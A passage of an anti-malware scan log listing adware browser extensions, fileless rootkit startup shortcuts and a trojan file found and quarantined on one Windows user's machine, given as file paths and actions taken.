PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\settings\common, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\_metadata, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\settings, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\common, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\revert, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0\logo, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj\28.11_0, Quarantined, [120], [443207],1.0.11632
PUP.Optional.MySearch, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\KDJGGBDJKCMBONMCLBNNPMFGIPHFKMDJ, Quarantined, [120], [443207],1.0.11632
 
File: 277
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\config\config.json, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\icons\icon128.png, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\icons\icon16.png, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\icons\icon19disabled.png, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\icons\icon19on.png, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\icons\icon48.png, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\localStorageContentScript.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\ajax.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\babAPI.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\babClickHandler.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\babContentScript.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\babContentScriptAPI.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\background.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\browserUtils.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\chrome.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\contentScriptConnectionManager.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\dateTimeUtils.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\dlp.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\dlpHelper.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\extensionDetect.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\index.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\logger.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\meta.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\offerService.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\pageUtils.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\PartnerId.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\polyfill.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\product.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\remoteConfigLoader.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\splashPageRedirectHandler.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\storageUtils.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\TemplateParser.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\ul.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\urlFragmentActions.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\urlUtils.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\util.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\webtooltabAPI.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\js\webTooltabAPIProxy.js, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\_locales\en\messages.json, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\_metadata\computed_hashes.json, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\_metadata\verified_contents.json, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\manifest.json, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp\13.882.15.37429_0\ntp.html, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mabloidgodmbnmnhoenmhlcjkfelomgp\000004.log, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mabloidgodmbnmnhoenmhlcjkfelomgp\000005.ldb, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mabloidgodmbnmnhoenmhlcjkfelomgp\CURRENT, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mabloidgodmbnmnhoenmhlcjkfelomgp\LOCK, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mabloidgodmbnmnhoenmhlcjkfelomgp\LOG, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mabloidgodmbnmnhoenmhlcjkfelomgp\LOG.old, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mabloidgodmbnmnhoenmhlcjkfelomgp\MANIFEST-000001, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\mabloidgodmbnmnhoenmhlcjkfelomgp\000003.log, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\mabloidgodmbnmnhoenmhlcjkfelomgp\CURRENT, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\mabloidgodmbnmnhoenmhlcjkfelomgp\LOCK, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\mabloidgodmbnmnhoenmhlcjkfelomgp\LOG, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\mabloidgodmbnmnhoenmhlcjkfelomgp\LOG.old, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\mabloidgodmbnmnhoenmhlcjkfelomgp\MANIFEST-000001, Quarantined, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [636], [182487],1.0.11632
PUP.Optional.MindSpark, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Preferences, Replaced, [636], [182487],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\about\css\style.css, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\about\img\close.png, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\about\img\setting.png, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\about\index.html, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\images\icon128.png, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\images\icon16.png, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\images\icon38.png, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\images\icon48.png, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\images\logo_disable.png, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\images\logo_enable.png, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\scripts\background.js, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\scripts\foreground.js, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\_metadata\computed_hashes.json, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\_metadata\verified_contents.json, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\manifest.json, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo\1.6_0\options.js, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejnoifmdngghahakfdlpbfllmodapmlo\000003.log, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejnoifmdngghahakfdlpbfllmodapmlo\CURRENT, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejnoifmdngghahakfdlpbfllmodapmlo\LOCK, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejnoifmdngghahakfdlpbfllmodapmlo\LOG, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejnoifmdngghahakfdlpbfllmodapmlo\LOG.old, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejnoifmdngghahakfdlpbfllmodapmlo\MANIFEST-000001, Quarantined, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [2371], [347109],1.0.11632
PUP.Optional.PrivacySwitch, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Preferences, Replaced, [2371], [347109],1.0.11632
Rootkit.Fileless.MTGen, C:\USERS\RICHARD\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\9A3A.LNK, Quarantined, [6302], [-1],0.0.0
Rootkit.Fileless.MTGen, C:\USERS\RICHARD\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DDE6.LNK, Quarantined, [6302], [-1],0.0.0
Trojan.Fileless.MTGen, C:\USERS\RICHARD\APPDATA\LOCAL\2B9A\F2DC.54BC6, Quarantined, [6571], [262349],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhkpbpdabcamdnnfbnipmllcppibnaha\000003.log, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhkpbpdabcamdnnfbnipmllcppibnaha\CURRENT, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhkpbpdabcamdnnfbnipmllcppibnaha\LOCK, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhkpbpdabcamdnnfbnipmllcppibnaha\LOG, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhkpbpdabcamdnnfbnipmllcppibnaha\LOG.old, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhkpbpdabcamdnnfbnipmllcppibnaha\MANIFEST-000001, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Preferences, Replaced, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\NHKPBPDABCAMDNNFBNIPMLLCPPIBNAHA\1.1_0\CHROMERESTORE.JS, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\css\description.css, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\css\popup.css, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\html\popup\description.html, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\html\popup\popup.html, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\js\popup\popup.js, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\js\userNewTab.js, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\newtab\quicktab.html, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\_locales\en\messages.json, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\_metadata\verified_contents.json, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\after.js, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\background.js, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\contentscript.js, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\icon.png, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Spigot.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha\1.1_0\manifest.json, Quarantined, [213], [454579],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gcaidkbhmgafpojklejljicnpnfnaokm\000003.log, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gcaidkbhmgafpojklejljicnpnfnaokm\CURRENT, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gcaidkbhmgafpojklejljicnpnfnaokm\LOCK, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gcaidkbhmgafpojklejljicnpnfnaokm\LOG, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gcaidkbhmgafpojklejljicnpnfnaokm\LOG.old, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gcaidkbhmgafpojklejljicnpnfnaokm\MANIFEST-000001, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Preferences, Replaced, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\GCAIDKBHMGAFPOJKLEJLJICNPNFNAOKM\1.1.18.508_0\MANIFEST.JSON, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\icons\128.png, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\icons\16.png, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\icons\32.png, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\icons\48.png, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\icons\64.png, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\icons\96.png, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\newtab\vendor\jquery\jquery-3.3.1.min.js, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\newtab\vendor\jquery\jquery-ui.min.css, Quarantined, [14751], [554504],1.0.11632
